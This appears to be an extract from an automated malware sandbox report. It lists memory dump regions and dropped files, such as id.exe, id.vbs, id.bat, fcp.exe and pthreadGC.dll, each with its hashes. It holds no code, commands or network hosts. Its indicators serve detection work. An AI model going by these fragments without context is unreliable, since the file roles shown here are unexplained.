memory/2460-184-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/768-186-0x0000000000400000-0x0000000000F11000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wVJxOQKKa.exe.log
| MD5 | 8ec831f3e3a3f77e4a7b9cd32b48384c |
| SHA1 | d83f09fd87c5bd86e045873c231c14836e76a05c |
| SHA256 | 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982 |
| SHA512 | 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3 |
C:\Program Files (x86)\System\id.exe
| MD5 | ba67693705f46b37b4f7d427d874d2bb |
| SHA1 | 502546afcab6bf7595d98cded71007ca60c340da |
| SHA256 | f49ee07aedaaaf52c7d4153fa37a13e8e38d80d08d05144deb28820096e62862 |
| SHA512 | 2258342982d36c52a3a27079ab39190f1fdbb7c9c6d336175d5eda70deecf74db3862662409f77c42c5e23e3989e00b66fb91c6e56622b0712ca85c17e163fea |
C:\Users\Admin\AppData\Local\Temp\id.vbs
| MD5 | 21cce90e924d3151a3c041382737cd32 |
| SHA1 | a5714a783cba4d307e243557ad58848e5c18626c |
| SHA256 | 4439fcafd565dfcf294b02cff6170b9a5754171bc2224c55da387a4907e6e9ce |
| SHA512 | 0c33cdb8edfdb2c48590252d9d9670df29d2d860113c9c2f1f998c9a075a23050277a6bfde38025fc89a937f71a27c6383525b5437ba40a7ae2419b32406a478 |
memory/552-203-0x0000000000400000-0x000000000107A000-memory.dmp
memory/4956-205-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/4956-207-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/552-208-0x0000000000400000-0x000000000107A000-memory.dmp
memory/2460-209-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/768-211-0x0000000000400000-0x0000000000F11000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\id.bat
| MD5 | 2a9efc9fb8e8aa423aab3b20c46e04c7 |
| SHA1 | 313b324233c048b14e83228a4fa2efc0454b2002 |
| SHA256 | 708ccc3654ced3ad1ebc917d0ae48ba3635464de9b71b05441e2e68526b32f8d |
| SHA512 | 334103136d264a4bf34172a6021582b16856b0e4bcceb958a72a62e92854832fd8620b988922c3b8eb6ae376df84ba4e654cc858ee96eb860ff88089a90ef41b |
C:\Users\Admin\AppData\Local\Temp\fcp.exe
| MD5 | d86fd26b2340cead820b2a905c177c63 |
| SHA1 | 313334f1d8e1a8a9c7473dead0a839c3f9855b86 |
| SHA256 | 6ece2458ddfc2bc9be6d14d1c377b2a52bf502f3757ba8024de383d85899e21b |
| SHA512 | b3dc478779d0e2a93e8fcac0e0a34e3737c8a08b0479203c73fda8f3e3345618d06485a070f17cc6d880d07c3436af4b4ba8df29dc184b0717f3a2753cbb6413 |
C:\Users\Admin\AppData\Local\Temp\pthreadGC.dll
| MD5 | 2d6a905cbe6766adf6da9d4f5a461571 |
| SHA1 | 4700349f065e96c40eb5f50aff554bf5b2eb2c21 |
| SHA256 | d47dc7d06a2873c65758568a16aee0349d87de35d8d6e7c4249f1276e81f14fa |
| SHA512 | 84e79aa2cf1d7d1d31224572f193ce5527504fb58ef79aa5e4fb672188b9dae4a5ebb4e1ba3a7d2958a0a43095023ed9ba2d36604570575fdd594d9b42786848 |
memory/2976-220-0x000000006B700000-0x000000006B70B000-memory.dmp
memory/2976-219-0x0000000000400000-0x0000000000452000-memory.dmp
memory/552-221-0x0000000000400000-0x000000000107A000-memory.dmp
memory/2460-222-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/552-226-0x0000000000400000-0x000000000107A000-memory.dmp
memory/2460-227-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/552-230-0x0000000000400000-0x000000000107A000-memory.dmp
memory/552-234-0x0000000000400000-0x000000000107A000-memory.dmp
memory/2460-235-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/552-242-0x0000000000400000-0x000000000107A000-memory.dmp
memory/2460-243-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/552-249-0x0000000000400000-0x000000000107A000-memory.dmp
memory/552-252-0x0000000000400000-0x000000000107A000-memory.dmp
memory/552-259-0x0000000000400000-0x000000000107A000-memory.dmp